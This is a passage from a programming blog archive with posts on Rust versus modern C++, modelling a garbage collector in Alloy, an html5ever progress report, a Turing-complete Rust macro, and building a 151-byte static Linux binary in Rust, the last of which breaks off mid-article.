main is usually a function

A Rust view on Effective Modern C++

2017-06-21T12:58:00.000-07:00

Recently I've been reading Effective Modern C++ by Scott Meyers. It's a great book that contains tons of practical advice, as well as horror stories to astound your friends and confuse your enemies. Since Rust shares many core ideas with modern C++, I thought I'd describe how some of the C++ advice translates to Rust, or doesn't.

This is not a general-purpose Rust / C++ comparison. Honestly, it might not make a lot of sense if you haven't read the book I'm referencing. There are a number of C++ features missing in Rust, for example integer template arguments and advanced template metaprogramming. I'll say no more about those because they aren't new to modern C++.

I may have a clear bias here because I think Rust is a better language for most new development. However, I massively respect the effort the C++ designers have put into modernizing the language, and I think it's still the best choice for many tasks.

There's a common theme that I'll avoid repeating: most of the C++ pitfalls that result in undefined behavior will produce compiler or occasionally runtime errors in Rust.

Chapters 1 & 2: Deducing Types / `auto`

This is what Rust and many other languages call "type inference". C++ has always had it for calls to function templates, but it became much more powerful in C++11 with the auto keyword.

Rust's type inference seems to be a lot simpler. I think the biggest reason is that Rust treats references as just another type, rather than the weird quasi-transparent things that they are in C++. Also, Rust doesn't require the auto keyword — whenever you want type inference, you just don't write the type. Rust also lacks std::initializer_list, which simplifies the rules further.

The main disadvantage in Rust is that there's no support to infer return types for fn functions, only for lambdas. Mostly I think it's good style to write out those types anyway; GHC Haskell warns when you don't. But it does mean that returning a closure without boxing is impossible, and returning a complex iterator chain without boxing is extremely painful. Rust is starting to improve the situation with -> impl Trait.

Rust lacks decltype and this is certainly a limitation. Some of the uses of decltype are covered by trait associated types. For example,

template<typename Container, typename Index>
auto get(Container& c, Index i)
    -> decltype(c[i])
{ … }

becomes

fn get<Container, Index, Output>(c: &Container, i: Index) -> &Output
    where Container: ops::Index<Index, Output=Output>
{ … }

The advice to see inferred types by intentionally producing a type error applies equally well in Rust.

Chapter 3: Moving to Modern C++

Initializing values in Rust is much simpler. Constructors are just static methods named by convention, and they take arguments in the ordinary way. For good or for ill, there's no std::initializer_list.

nullptr is not an issue in Rust. &T and &mut T can't be null, and you can make null raw pointers with ptr::null() or ptr::null_mut(). There are no implicit conversions between pointers and integral types.

Regarding aliases vs. typedefs, Rust also supports two syntaxes:

use foo::Bar as Baz;
type Baz = foo::Bar;

type is a lot more common, and it supports type parameters.

Rust enums are always strongly typed. They are scoped unless you explicitly use MyEnum::*;. A C-like enum (one with no data fields) can be cast to an integral type.

f() = delete; has no equivalent in Rust, because Rust doesn't implicitly define functions for you in the first place.

Similar to the C++ override keyword, Rust requires a default keyword to enable trait specialization. Unlike in C++, it's mandatory.

As in C++, Rust methods can be declared to take self either by reference or by move. Unlike in C++, you can't easily overload the same method to allow either.

Rust supports const iterators smoothly. It's up to the iterator whether it yields T, &T, or &mut T (or even something else entirely).

The IntoIterator trait takes the place of functions like std::begin that produce an iterator from any collection.

Rust has no equivalent to noexcept. Any function can panic, unless panics are disabled globally. This is pretty unfortunate when writing unsafe code to implement data types that have to be exception-safe. However, recoverable errors in Rust use Result, which is part of the function's type.

Rust supports a limited form of compile-time evaluation, but it's not yet nearly as powerful as C++14 constexpr. This is set to improve with the introduction of miri.

In Rust you mostly don't have to worry about "making const member functions thread safe". If something is shared between threads, the compiler will ensure it's free of thread-related undefined behavior. (This to me is one of the coolest features of Rust!) However, you might run into higher-level issues such as deadlocks that Rust's type system can't prevent.

There are no special member functions in Rust, e.g. copy constructors. If you want your type to be Clone or Copy, you have to opt-in with a derive or a manual impl.

Chapter 4: Smart Pointers

Smart pointers are very important in Rust, as in modern C++. Much of the advice in this chapter applies directly to Rust.

std::unique_ptr corresponds directly to Rust's Box type. However, Box doesn't support custom deallocation code. If you need that, you have to either make it part of impl Drop on the underlying type, or write your own smart pointer. Box also does not support custom allocators.

std::shared_ptr corresponds to Rust's Arc type. Both provide thread-safe reference counting. Rust also supports much faster thread-local refcounting with the Rc type. Don't worry, the compiler will complain if you try to send an Rc between threads.

C++ standard libraries usually implement shared_ptr as a "fat pointer" containing both a pointer to the underlying value and a pointer to a refcount struct. Rust's Rc and Arc store the refcounts directly before the value in memory. This means that Rc and Arc are half the size of shared_ptr, and may perform better due to fewer indirections. On the downside, it means you can't upgrade Box to Rc/Arc without a reallocation and copy. It could also introduce performance problems on certain workloads, due to cache line sharing between the refcounts and the data. (I would love to hear from anyone who has run into this!) Boost supports intrusive_ptr which should perform very similarly to Rust's Arc.

Like Box, Rc and Arc don't support custom deleters or allocators.

Rust supports weak pointer variants of both Rc and Arc. Rather than panicing or returning NULL, the "upgrade" operation returns None, as you'd expect in Rust.

Chapter 5: Rvalue References, Move Semantics, and Perfect Forwarding

This is a big one. Move semantics are rare among programming languages, but they're key in both Rust and C++. However, the two languages take very different approaches, owing to the fact that Rust was designed around moves whereas they're a late addition to C++.

There's no std::move in Rust. Moves are the default for non-Copy types. The behavior of a move or copy is always a shallow bit-wise copy; there is no way to override it. This can greatly improve performance. For example, when a Rust Vec changes address due to resizing, it will use a highly optimized memcpy. In comparison, C++'s std::vector has to call the move constructor on every element, or the copy constructor if there's no noexcept move constructor.

However the inability to hook moves and the difficulty of creating immovable types is an obstacle for certain kinds of advanced memory management, such as intrusive pointers and interacting with external garbage collectors.

Moves in C++ leave the source value in an unspecified but valid state — for example, an empty vector or a NULL unique pointer. This has several weird consequences:

A move counts as mutating a source variable, so "Move requests on const objects are silently transformed into copy operations". This is a surprising performance leak.
The moved-out-of variable can still be used after the move, and you don't necessarily know what you'll get.
The destructor will still run and must take care not to invoke undefined behavior.

The first two points don't apply in Rust. You can move out of a non-mut variable. The value isn't considered mutated, it's considered gone. And the compiler will complain if you try to use it after the move.

The third point is somewhat similar to old Rust, where types with a destructor would contain an implicit "drop flag" indicating whether they had already been moved from. As of Rust 1.12 (September 2016), these hidden struct fields are gone, and good riddance! If a variable has been moved from, the compiler simply omits a call to its destructor. In the situations where a value may or may not have been moved (e.g. move in an if branch), Rust uses local variables on the stack.

Rust doesn't have a feature for perfect forwarding. There's no need to treat references specially, as they're just another type. Because there are no rvalue references in Rust, there's also no need for universal / forwarding references, and no std::forward.

However, Rust lacks variadic generics, so you can't do things like "factory function that forwards all arguments to constructor".

Item 29 says "Assume that move operations are not present, not cheap, and not used". I find this quite dispiriting! There are so many ways in C++ to think that you're moving a value when you're actually calling an expensive copy constructor — and compilers won't even warn you!

In Rust, moves are always available, always as cheap as memcpy, and always used when passing by value. Copy types don't have move semantics, but they act the same at runtime. The only difference is whether the static checks allow you to use the source location afterwards.

All in all, moves in Rust are more ergonomic and less surprising. Rust's treatment of moves should also perform better, because there's no need to leave the source object in a valid state, and there's no need to call move constructors on individual elements of a collection. (But can we benchmark this?)

There's a bunch of other stuff in this chapter that doesn't apply to Rust. For example, "The interaction among perfect-forwarding constructors and compiler-generated copy and move operations develops even more wrinkles when inheritance enters the picture." This is the kind of sentence that will make me run away screaming. Rust doesn't have any of those features, gets by fine without them, and thus avoids such bizarre interactions.

Chapter 6: Lambda Expressions

C++ allows closures to be copied; Rust doesn't.

In C++ you can specify whether a lambda expression's captures are taken into the closure by reference or by value, either individually or for all captures at once. In Rust this is mostly inferred by how you use the captures: whether they are mutated, and whether they are moved from. However, you can prefix the move keyword to force all captures to be taken by value. This is useful when the closure itself will outlive its environment, common when spawning threads for example.

Rust uses this inference for another purpose: determining which Fn* traits a closure will implement. If the lambda body moves out of a capture, it can only implement FnOnce, whose "call" operator takes self by value. If it doesn't move but does mutate captures, it will implement FnOnce and FnMut, whose "call" takes &mut self. And if it neither moves nor mutates, it will implement all of FnOnce, FnMut, and Fn. C++ doesn't have traits (yet) and doesn't distinguish these cases. If your lambda moves from a capture, you can call it again and you'll see whatever "empty" value was left behind by the move constructor.

Rust doesn't support init capture; however, move capture is supported natively. You can do whatever init you like outside the lambda and then move the result in.

Like C++, Rust allows inference of closure parameter types. Unlike C++, an individual closure cannot be generic.

Chapter 7: The Concurrency API

Rust doesn't have futures in the standard library; they're part of an external library maintained by a core Rust developer. They're also used for async I/O.

In C++, dropping a std::thread that is still running terminates the program, which certainly seems un-fun to me. The behavior is justified by the possibility that the thread captures by reference something from its spawning context. If the thread then outlived that context, it would result in undefined behavior. In Rust, this can't happen because thread::spawn(f) has a 'static bound on the type of f. So, when a Rust JoinHandle falls out of scope, the thread is safely detached and continues to run.

The other possibility, in either language, is to join threads on drop, waiting for the thread to finish. However this has surprising performance implications and still isn't enough to allow threads to safely borrow from their spawning environment. Such "scoped threads" are provided by libraries in Rust and use a different technique to ensure safety.

C++ and Rust both provide atomic variables. In C++ they support standard operations such as assignment, ++, and atomic reads by conversion to the underlying type. These all use the "sequentially consistent" memory ordering, which provides the strongest guarantees. Rust is more explicit, using dedicated methods like fetch_add which also specify the memory ordering. (This kind of API is also available in C++.)

This chapter also talks about the C++ type qualifier volatile, even though it has to do with stuff like memory-mapped I/O and not threads. Rust doesn't have volatile types; instead, a volatile read or write is done using an intrinsic function.

Chapter 8: Tweaks

Rust containers don't have methods like emplace_back. You can however use the experimental placement-new feature.

Conclusions

Rust and C++ share many features, allowing a detailed comparison between them. Rust is a much newer design that isn't burdened with 20 years of backwards compatibility. This I think is why Rust's versions of these core features tend to be simpler and easier to reason about. On the other hand, Rust gains some complexity by enforcing strong static guarantees.

There are of course some differences of principle, not just historical quirks. C++ has an object system based on classes and inheritance, even allowing multiple inheritance. There's no equivalent in Rust. Rust also prefers simple and explicit semantics, while C++ allows a huge amount of implicit behavior. You see this for example with implicit copy construction, implicit conversions, ad-hoc function overloading, quasi-transparent references, and the operators on atomic values. There are still some implicit behaviors in Rust, but they're carefully constrained. Personally I prefer Rust's explicit style; I find there are too many cases where C++ doesn't "do what I mean". But other programmers may disagree, and that's fine.

I hope and expect that C++ and Rust will converge on similar feature-sets. C++ is scheduled to get a proper module system, a "concepts" system similar to traits, and a subset with statically-checkable memory safety. Rust will eventually have integer generics, variadic generics, and more powerful const fn. It's an exciting time for both languages :)

Modeling garbage collectors with Alloy: part 1

2015-05-03T14:21:00.000-07:00

Formal methods for software verification are usually seen as a high-cost tool that you would only use on the most critical systems, and only after extensive informal verification. The Alloy project aims to be something completely different: a lightweight tool you can use at any stage of everyday software development. With just a few lines of code, you can build a simple model to explore design issues and corner cases, even before you've started writing the implementation. You can gradually make the model more detailed as your requirements and implementation get more complex. After a system is deployed, you can keep the model around to evaluate future changes at low cost.

Sounds great, doesn't it? I have only a tiny bit of prior experience with Alloy and I wanted to try it out on something more substantial. In this article we'll build a simple model of a garbage collector, visualize its behavior, and fix some problems. This is a warm-up for exploring more complex GC algorithms, which will be the subject of future articles.

I won't describe the Alloy syntax in full detail, but you should be able to follow along if you have some background in programming and logic. See also the Alloy documentation and especially the book Software Abstractions: Logic, Language, and Analysis by Daniel Jackson, which is a very practical and accessible introduction to Alloy. It's a highly recommended read for any software developer.

You can download Alloy as a self-contained Java executable, which can do analysis and visualization and includes an editor for Alloy code.

The model

We will start like so:

open util/ordering [State]

sig Object { }
one sig Root extends Object { }

sig State {
    pointers: Object -> set Object,
    collected: set Object,
}

The garbage-collected heap consists of Objects, each of which can point to any number of other Objects (including itself). There is a distinguished object Root which represents everything that's accessible without going through the heap, such as global variables and the function call stack. We also track which objects have already been garbage-collected. In a real implementation these would be candidates for re-use; in our model they stick around so that we can detect use-after-free.

The open statement invokes a library module to provide a total ordering on States, which we will interpret as the progression of time. More on this later.

Relations

In the code that follows, it may look like Alloy has lots of different data types, overloading operators with total abandon. In fact, all these behaviors arise from an exceptionally simple data model:

Every value is a relation; that is, a set of tuples of the same non-zero length.

When each tuple has length 1, we can view the relation as a set. When each tuple has length 2, we can view it as a binary relation and possibly as a function. And a singleton set is viewed as a single atom or tuple.

Since everything in Alloy is a relation, each operator has a single definition in terms of relations. For example, the operators . and [] are syntax for a flavor of relational join. If you think of the underlying relations as a database, then Alloy's clever syntax amounts to an object-relational mapping that is at once very simple and very powerful. Depending on context, these joins can look like field access, function calls, or data structure lookups, but they are all described by the same underlying framework.

The elements of the tuples in a relation are atoms, which are indivisible and have no meaning individually. Their meaning comes entirely from the relations and properties we define. Ultimately, atoms all live in the same universe, but Alloy gives "warnings" when the type system implied by the sig declarations can prove that an expression is always the empty relation.

Here are the relations implied by our GC model, as tuple sets along with their types:

Object: {Object} = {O1, O2, ..., Om}
Root:   {Root}   = {Root}
State:  {State}  = {S1, S2, ..., Sn}

pointers:  {(State, Object, Object)}
collected: {(State, Object)}

first: {State} = {S1}
last:  {State} = {Sn}
next:  {(State, State)} = {(S1, S2), (S2, S3), ..., (S(n-1), Sn)}

The last three relations come from the util/ordering library. Note that a sig implicitly creates some atoms.

Dynamics

The live objects are everything reachable from the root:

fun live(s: State): set Object {
    Root.*(s.pointers)
}

*(s.pointers) constructs the reflexive, transitive closure of the binary relation s.pointers; that is, the set of objects reachable from each object.

Of course the GC is only part of a system; there's also the code that actually uses these objects, which in GC terminology is called the mutator. We can describe the action of each part as a predicate relating "before" and "after" states.

pred mutate(s, t: State) {
    t.collected = s.collected
    t.pointers != s.pointers
    all a: Object - t.live |
        t.pointers[a] = s.pointers[a]
}

pred gc(s, t: State) {
    t.pointers = s.pointers
    t.collected = s.collected + (Object - s.live)
    some t.collected - s.collected
}

The mutator cannot collect garbage, but it can change the pointers of any live object. The GC doesn't touch the pointers, but it collects any dead object. In both cases we require that something changes in the heap.

It's time to state the overall facts of our model:

fact {
    no first.collected
    first.pointers = Root -> (Object - Root)
    all s: State - last |
        let t = s.next |
        mutate[s, t] or gc[s, t]
}

This says that in the initial state, no object has been collected, and every object is in the root set except Root itself. This means we don't have to model allocation as well. Each state except the last must be followed by a mutator step or a GC step.

The syntax all x: e | P says that the property P must hold for every tuple x in e. Alloy supports a variety of quantifiers like this.

Interacting with Alloy

The development above looks nice and tidy — I hope — but in reality, it took a fair bit of messing around to get to this point. Alloy provides a highly interactive development experience. At any time, you can visualize your model as a collection of concrete examples. Let's do that now by adding these commands:

pred Show {}
run Show for 5

Now we select this predicate from the "Execute" menu, then click "Show". The visualizer provides many options to customise the display of each atom and relation. The config that I made for this project is "projected over State", which means you see a graph of the heap at one moment in time, with forward/back buttons to reach the other States.

After clicking around a bit, you may notice some oddities:

The root isn't a heap object; it represents all of the pointers that are reachable without accessing the heap. So it's meaningless for an object to point to the root. We can exclude these cases from the model easily enough:

fact {
    all s: State | no s.pointers.Root
}

(This can also be done more concisely as part of the original sig.)

Now we're ready to check the essential safety property of a garbage collector:

assert no_dangling {
    all s: State | no (s.collected & s.live)
}

check no_dangling for 5 Object, 10 State

And Alloy says:

Executing "Check no_dangling for 5 Object, 10 State"
   ...
   8338 vars. 314 primary vars. 17198 clauses. 40ms.
   Counterexample found. Assertion is invalid. 14ms.

Clicking "Counterexample" brings up the visualization:

Whoops, we forgot to say that only pointers to live objects can be stored! We can fix this by modifying the mutate predicate:

pred mutate(s, t: State) {
    t.collected = s.collected
    t.pointers != s.pointers
    all a: Object - t.live |
        t.pointers[a] = s.pointers[a]

    // new requirement!
    all a: t.live |
        t.pointers[a] in s.live
}

With the result:

Executing "Check no_dangling for 5 Object, 10 State"
   ...
   8617 vars. 314 primary vars. 18207 clauses. 57ms.
   No counterexample found. Assertion may be valid. 343ms.

SAT solvers and bounded model checking

"May be" valid? Fortunately this has a specific meaning. We asked Alloy to look for counterexamples involving at most 5 objects and 10 time steps. This bounds the search for counterexamples, but it's still vastly more than we could ever check by exhaustive brute force search. (See where it says "8617 vars"? Try raising 2 to that power.) Rather, Alloy turns the bounded model into a Boolean formula, and feeds it to a SAT solver.

This all hinges on one of the weirdest things about computing in the 21st century. In complexity theory, SAT (along with many equivalents) is the prototypical "hardest problem" in NP. Why do we intentionally convert our problem into an instance of this "hardest problem"? I guess for me it illustrates a few things:

The huge gulf between worst-case complexity (the subject of classes like NP) and average or "typical" cases that we encounter in the real world. For more on this, check out Impagliazzo's "Five Worlds" paper.
The fact that real-world difficulty involves a coordination game. SAT solvers got so powerful because everyone agrees SAT is the problem to solve. Standard input formats and public competitions were a key part of the amazing progress over the past decade or two.

Of course SAT solvers aren't quite omnipotent, and Alloy can quickly get overwhelmed when you scale up the size of your model. Applicability to the real world depends on the small scope hypothesis:

If an assertion is invalid, it probably has a small counterexample.

Or equivalently:

Systems that fail on large instances almost always fail on small instances with similar properties.

This is far from a sure thing, but it already underlies a lot of approaches to software testing. With Alloy we have the certainty of proof within the size bounds, so we don't have to resort to massive scale to find rare bugs. It's difficult (but not impossible!) to imagine a GC algorithm that absolutely cannot fail on fewer than 6 nodes, but is buggy for larger heaps. Implementations will often fall over at some arbitrary resource limit, but algorithms and models are more abstract.

Conclusion

It's not surprising that our correctness property

all s: State | no (s.collected & s.live)

holds, since it's practically a restatement of the garbage collection "algorithm":

t.collected = s.collected + (Object - s.live)

Because reachability is built into Alloy, via transitive closure, the simplest model of a garbage collector does not really describe an implementation. In the next article we'll look at incremental garbage collection, which breaks the reachability search into small units and allows the mutator to run in-between. This is highly desirable for interactive or real-time apps; it also complicates the algorithm quite a bit. We'll use Alloy to uncover some of these complications.

In the meantime, you can play around with the simple GC model and ask Alloy to visualize any scenario you like. For example, we can look at runs where the final state includes at least 5 pointers, and at least one collected object:

pred Show {
    #(last.pointers) >= 5
    some last.collected
}

run Show for 5

Thanks for reading! You can find the code in a GitHub repository which I'll update if/when we get around to modeling more complex GCs.

html5ever project update: one year!

2015-03-18T15:29:00.000-07:00

I started the html5ever project just a bit over one year ago. We adopted the current name last July.

<kmc> maybe the whole project needs a better name, idk
<Ms2ger> htmlparser, perhaps
<jdm> tagsoup
<Ms2ger> UglySoup
<Ms2ger> Since BeautifulSoup is already taken
<jdm> html5ever
<Ms2ger> No
<jdm> you just hate good ideas
<pcwalton> kmc: if you don't call it html5ever that will be a massive missed opportunity

By that point we already had a few contributors. Now we have 469 commits from 18 people, which is just amazing. Thank you to everyone who helped with the project. Over the past year we've upgraded Rust almost 50 times; I'm extremely grateful to the community members who had a turn at this Sisyphean task.

Several people have also contributed major enhancements. For example:

Clark Gaebel implemented zero-copy parsing. I'm in the process of reviewing this code and will be landing pieces of it in the next few weeks.
Josh Matthews made it possible to suspend and resume parsing from the tree sink. Servo needs this to do async resource fetching for external <script>s of the old-school (non-async/defer) variety.
Chris Paris implemented fragment parsing and improved serialization. This means Servo can use html5ever not only for parsing whole documents, but also for the innerHTML/outerHTML getters and setters within the DOM.
Adam Roben brought us dramatically closer to spec conformance. Aside from foreign (XML) content and <template>, we pass 99.6% of the html5lib tokenizer and tree builder tests! Adam also improved the build and test infrastructure in a number of ways.

I'd also like to thank Simon Sapin for doing the initial review of my code, and finding a few bugs in the process.

html5ever makes heavy use of Rust's metaprogramming features. It's been something of a wild ride, and we've collaborated with the Rust team in a number of ways. Felix Klock came through in a big way when a Rust upgrade broke the entire tree builder. Lately, I've been working on improvements to Rust's macro system ahead of the 1.0 release, based in part on my experience with html5ever.

Even with the early-adopter pains, the use of metaprogramming was absolutely worth it. Most of the spec-conformance patches were only a few lines, because our encoding of parser rules is so close to what's written in the spec. This is especially valuable with a "living standard" like HTML.

The future

Two upcoming enhancements are a high priority for Web compatibility in Servo:

Character encoding detection and conversion. This will build on the zero-copy UTF-8 parsing mentioned above. Non-UTF-8 content (~15% of the Web) will have "one-copy parsing" after a conversion to UTF-8. This keeps the parser itself lean and mean.
document.write support. This API can insert arbitrary UTF-16 code units (which might not even be valid Unicode) in the middle of the UTF-8 stream. To handle this, we might switch to WTF-8. Along with document.write we'll start to do speculative parsing.

It's likely that I'll work on one or both of these in the next quarter.

Servo may get SVG support in the near future, thanks to canvg. SVG nodes can be embedded in HTML or loaded from an external XML file. To support the first case, html5ever needs to implement WHATWG's rules for parsing foreign content in HTML. To handle external SVG we could use a proper XML parser, or we could extend html5ever to support "XML5", an error-tolerant XML syntax similar to WHATWG HTML. Ygg01 made some progress towards implementing XML5. Servo would most likely use it for XHTML as well.

Improved performance is always a goal. html5ever describes itself as "high-performance" but does not have specific comparisons to other HTML parsers. I'd like to fix that in the near future. Zero-copy parsing will be a substantial improvement, once some performance issues in Rust get fixed. I'd like to revisit SSE-accelerated parsing as well.

I'd also like to support html5ever on some stable Rust 1.x version, although it probably won't happen for 1.0.0. The main obstacle here is procedural macros. Erick Tryzelaar has done some great work recently with syntex, aster, and quasi. Switching to this ecosystem will get us close to 1.x compatibility and will clean up the macro code quite a bit. I'll be working with Erick to use html5ever as an early validation of his approach.

Simon has extracted Servo's CSS selector matching engine as a stand-alone library. Combined with html5ever this provides most of the groundwork for a full-featured HTML manipulation library.

The C API for html5ever still builds, thanks to continuous integration. But it's not complete or well-tested. With the removal of Rust's runtime, maintaining the C API does not restrict the kind of code we can write in other parts of the parser. All we need now is to complete the C API and write tests. This would be a great thing for a community member to work on. Then we can write bindings for every language under the sun and bring fast, correct, memory-safe HTML parsing to the masses :)

Turing tarpits in Rust's macro system

2015-02-20T17:55:00.001-08:00

Bitwise Cyclic Tag is an extremely simple automaton slash programming language. BCT uses a program string and a data string, each made of bits. The program string is interpreted as if it were infinite, by looping back around to the first bit.

The program consists of commands executed in order. There is a single one-bit command:

0: Delete the left-most data bit.

and a single two-bit command:

1 x: If the left-most data bit is 1, copy bit x to the right of the data string.

We halt if ever the data string is empty.

Remarkably, this is enough to do universal computation. Implementing it in Rust's macro system gives a proof (probably not the first one) that Rust's macro system is Turing-complete, aside from the recursion limit imposed by the compiler.

#![feature(trace_macros)]

macro_rules! bct {
    // cmd 0:  d ... => ...
    (0, $($ps:tt),* ; $_d:tt)
        => (bct!($($ps),*, 0 ; ));
    (0, $($ps:tt),* ; $_d:tt, $($ds:tt),*)
        => (bct!($($ps),*, 0 ; $($ds),*));

    // cmd 1p:  1 ... => 1 ... p
    (1, $p:tt, $($ps:tt),* ; 1)
        => (bct!($($ps),*, 1, $p ; 1, $p));
    (1, $p:tt, $($ps:tt),* ; 1, $($ds:tt),*)
        => (bct!($($ps),*, 1, $p ; 1, $($ds),*, $p));

    // cmd 1p:  0 ... => 0 ...
    (1, $p:tt, $($ps:tt),* ; $($ds:tt),*)
        => (bct!($($ps),*, 1, $p ; $($ds),*));

    // halt on empty data string
    ( $($ps:tt),* ; )
        => (());
}

fn main() {
    trace_macros!(true);
    bct!(0, 0, 1, 1, 1 ; 1, 0, 1);
}

This produces the following compiler output:

bct! { 0 , 0 , 1 , 1 , 1 ; 1 , 0 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 }
bct! { 1 , 1 , 1 , 0 , 0 ; 1 }
bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }
bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }
bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }
...
bct.rs:19:13: 19:45 error: recursion limit reached while expanding the macro `bct`
bct.rs:19         => (bct!($($ps),*, 1, $p ; $($ds),*));
                      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

You can try it online, as well.

Notes about the macro

I would much rather drop the commas and write

// cmd 0:  d ... => ...
(0 $($ps:tt)* ; $_d:tt $($ds:tt)*)
    => (bct!($($ps)* 0 ; $($ds)*));

// cmd 1p:  1 ... => 1 ... p
(1 $p:tt $($ps:tt)* ; 1 $($ds:tt)*)
    => (bct!($($ps)* 1 $p ; 1 $($ds)* $p));

// cmd 1p:  0 ... => 0 ...
(1 $p:tt $($ps:tt)* ; $($ds:tt)*)
    => (bct!($($ps)* 1 $p ; $($ds)*));

but this runs into the macro future-proofing rules.

If we're required to have commas, then it's at least nice to handle them uniformly, e.g.

// cmd 0:  d ... => ...
(0 $(, $ps:tt)* ; $_d:tt $(, $ds:tt)*)
    => (bct!($($ps),*, 0 ; $($ds),*));

// cmd 1p:  1 ... => 1 ... p
(1, $p:tt $(, $ps:tt)* ; $($ds:tt),*)
    => (bct!($($ps),*, 1, $p ; 1 $(, $ds)*, $p));

// cmd 1p:  0 ... => 0 ...
(1, $p:tt $(, $ps:tt)* ; $($ds:tt),*)
    => (bct!($($ps),*, 1, $p ; $($ds),*));

But this too is disallowed. An $x:tt variable cannot be followed by a repetition $(...)*, even though it's (I believe) harmless. There is an open RFC about this issue. For now I have to handle the "one" and "more than one" cases separately, which is annoying.

In general, I don't think macro_rules! is a good language for arbitrary computation. This experiment shows the hassle involved in implementing one of the simplest known "arbitrary computations". Rather, macro_rules! is good at expressing patterns of code reuse that don't require elaborate compile-time processing. It does so in a way that's declarative, hygienic, and high-level.

However, there is a big middle ground of non-elaborate, but non-trivial computations. macro_rules! is hardly ideal for that, but procedural macros have problems of their own. Indeed, the bct! macro is an extreme case of a pattern I've found useful in the real world. The idea is that every recursive invocation of a macro gives you another opportunity to pattern-match the arguments. Some of html5ever's macros do this, for example.

151-byte static Linux binary in Rust

2015-01-10T18:03:00.000-08:00

Part of the sales pitch for Rust is that it's "as bare metal as C".¹ Rust can do anything C can do, run anywhere C can run,² with code that's just as efficient, and at least as safe (but usually much safer).

I'd say this claim is about 95% true, which is pretty good by the standards of marketing claims. A while back I decided to put it to the test, by making the smallest, most self-contained Rust program possible. After resolving a few issues along the way, I ended up with a 151-byte, statically linked executable for AMD64 Linux. With the release of Rust 1.0-alpha, it's time to show this off.

Here's the Rust code:

#![crate_type="rlib"]
#![allow(unstable)]

#[macro_use] extern crate syscall;

use std::intrinsics;

fn exit(n: usize) -> ! {
    unsafe {
        syscall!(EXIT, n);
        intrinsics::unreachable()
    }
}

fn write(fd: usize, buf: &[u8]) {
    unsafe {
        syscall!(WRITE, fd, buf.as_ptr(), buf.len());
    }
}

#[no_mangle]
pub fn main() {
    write(1, "Hello!\n".as_bytes());
    exit(0);
}

This uses my syscall library, which provides the syscall! macro. We wrap the underlying system calls with Rust functions, each exposing a safe interface to the unsafe syscall! macro. The main function uses these two safe functions and doesn't need its own unsafe annotation. Even in such a small program, Rust allows us to isolate memory unsafety to a subset of the code.

Because of crate_type="rlib", rustc will build this as a static library, from which we extract a single object file tinyrust.o:

$ rustc tinyrust.rs \
    -O -C no-stack-check -C relocation-model=static \
    -L syscall.rs/target
$ ar x libtinyrust.rlib tinyrust.o
$ objdump -dr tinyrust.o
0000000000000000 <main>:
   0:   b8 01 00 00 00          mov    $0x1,%eax
   5:   bf 01 00 00 00          mov    $0x1,%edi
   a:   be 00 00 00 00          mov    $0x0,%esi
                        b: R_X86_64_32  .rodata.str1625
   f:   ba 07 00 00 00          mov    $0x7,%edx
  14:   0f 05                   syscall 
  16:   b8 3c 00 00 00          mov    $0x3c,%eax
  1b:   31 ff                   xor    %edi,%edi
  1d:   0f 05                   syscall

We disable stack exhaustion checking, as well as position-independent code, in order to slim down the output. After optimization, the only instructions that survive come from inline assembly blocks in the syscall library.

Note that main doesn't end in a ret instruction. The exit function (which gets inlined) is marked with a "return type" of !, meaning "doesn't return". We make good on this by invoking the unreachable intrinsic after syscall!. LLVM will optimize under the assumption that we can never reach this point, making no guarantees about the program behavior if it is reached. This represents the fact that the kernel is actually going to kill the process before syscall!(EXIT, n) can return.

Because we use inline assembly and intrinsics, this code is not going to work on a stable-channel build of Rust 1.0. It will require an alpha or nightly build until such time as inline assembly and intrinsics::unreachable are added to the stable language of Rust 1.x.

Note that I didn't even use #![no_std]! This program is so tiny that everything it pulls from libstd is a type definition, macro, or fully inlined function. As a result there's nothing of libstd left in the compiler output. In a larger program you may need #![no_std], although its role is greatly reduced following the removal of Rust's runtime.

Linking

This is where things get weird.

Whether we compile from C or Rust,³ the standard linker toolchain is going to include a bunch of junk we don't need. So I cooked up my own linker script:

SECTIONS {
    . = 0x400078;
  
    combined . : AT(0x400078) ALIGN(1) SUBALIGN(1) {
        *(.text*)
        *(.data*)
        *(.rodata*)
        *(.bss*)
    }
}

We smash all the sections together, with no alignment padding, then extract that section as a headerless binary blob:

$ ld --gc-sections -e main -T script.ld -o payload tinyrust.o
$ objcopy -j combined -O binary payload payload.bin

Finally we stick this on the end of a custom ELF header. The header is written in NASM syntax but contains no instructions, only data fields. The base address 0x400078 seen above is the end of this header, when the whole file is loaded at 0x400000. There's no guarantee that ld will put main at the beginning of the file, so we need to separately determine the address of main and fill that in as the e_entry field in the ELF file header.

$ ENTRY=$(nm -f posix payload | grep '^main ' | awk '{print $3}')
$ nasm -f bin -o tinyrust -D entry=0x$ENTRY elf.s
$ chmod +x ./tinyrust
$ ./tinyrust
Hello!

It works! And the size:

$ wc -c < tinyrust
158

Seven bytes too big!

The final trick

To get down to 151 bytes, I took inspiration from this classic article, which observes that padding fields in the ELF header can be used to store other data. Like, say, a string constant. The Rust code changes to access this constant:

use std::{mem, raw};

#[no_mangle]
pub fn main() {
    let message: &'static [u8] = unsafe {
        mem::transmute(raw::Slice {
            data: 0x00400008 as *const u8,
            len: 7,
        })
    };

    write(1, message);
    exit(0);
}

